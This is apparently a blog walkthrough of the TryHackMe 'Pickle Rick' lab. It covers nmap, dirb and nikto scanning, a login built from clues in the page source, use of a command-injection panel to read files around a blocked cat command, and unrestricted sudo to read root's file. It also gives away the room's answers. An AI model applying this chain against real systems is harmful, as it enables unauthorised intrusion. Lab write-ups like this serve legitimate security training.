WalkThrough for the TryHackMe Pickle Rick Room

The TryHackMe Pickle Rick room is available at https://tryhackme.com/room/picklerick

Reconnaissance

First lets find out what is running on the machine

sudo nmap -sS -p- -T4 -vv x.x.x.x
  • -sS for Syn/Stealth Scan
  • -p- to scan all 65535 ports
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the result

  • PORT STATE SERVICE REASON
  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63

Now lets find out a little more about those ports.

sudo nmap -sS -p22,80 -sV -T4 -vv x.x.x.x 
  • -sS for Syn/Stealth Scan
  • -p22,80 to only scan ports 22 and 80
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the result

  • PORT STATE SERVICE REASON VERSION
  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we know it’s running a webserver, lets see what it shows

Now lets do a little more scanning. First lets use dirb to find any interesting files or folders

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

Which gives us the results

We should check out the /assets/ folder and the robots.txt file

And lets run nikto to see if it can find any issues

nikto -h http://x.x.x.x 

Which gives us the results

  • – Nikto v2.1.6/2.1.5
  • + Target Host: 10.10.115.220
  • + Target Port: 80
  • + GET The anti-clickjacking X-Frame-Options header is not present.
  • + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  • + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  • + HEAD Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  • + GET Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
  • + OPTIONS Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
  • + GET Cookie PHPSESSID created without the httponly flag
  • + OSVDB-3233: GET /icons/README: Apache default file found.
  • + GET /login.php: Admin login page/section found.

Looks like there is an login.php page we can check out.

Exploitation

Visiting http://x.x.x.x doesn’t give us anything. But when we look at the source code for the site, we find something useful. A login name

Next, lets visit http://x.x.x.x/robots.txt, this might tell us something about directories we shouldn’t know about. This robots.txt is not standard. But maybe the text could be something else.

And now visiting the http://x.x.x.x/login.php we found with niko, and the info we found in the page source and robots.txt, we can login.

Which brings us to this

Command Injection

From the OWASP website

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell

Running the command ls -l gives us the file listing and the file with the first answer

It looks like the cat command is blocked, but not the less command. So we can run the following command to get answer number 1.

less Sup3rS3cretPick13Ingred.txt

Directory Traversal

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.

Let’s run the command

ls /

This gives us a list of directories from the root

Next, lets run the command

ls /home/

This tells us that there are two home directories on this server.

Since this is a Rick and Morty themed machine, lets see what is in the rick home folder.

And there is the file with answer number 2. You can use less to read the file, but, since the file has space in it, we need to use the quotation marks. So use the command

less "/home/rick/second ingredients"

Privilege Escalation

Privilege Escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. And the authors at TryHackMe like to make at least on flag only readable by root.

Lets see if there are are command we can run with sudo that give us root access. So run the command

sudo -l

Which gives us a very scary output

Basically this means that you can run ANY command with sudo. Never do this on a real machine, its a major security issue.

So lets try

sudo ls /root/

And there we can see the third and final answer.

sudo less /root/3rd.txt

Run the following command and you have all the ingredients to turn Rick back into a human from a pickle.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s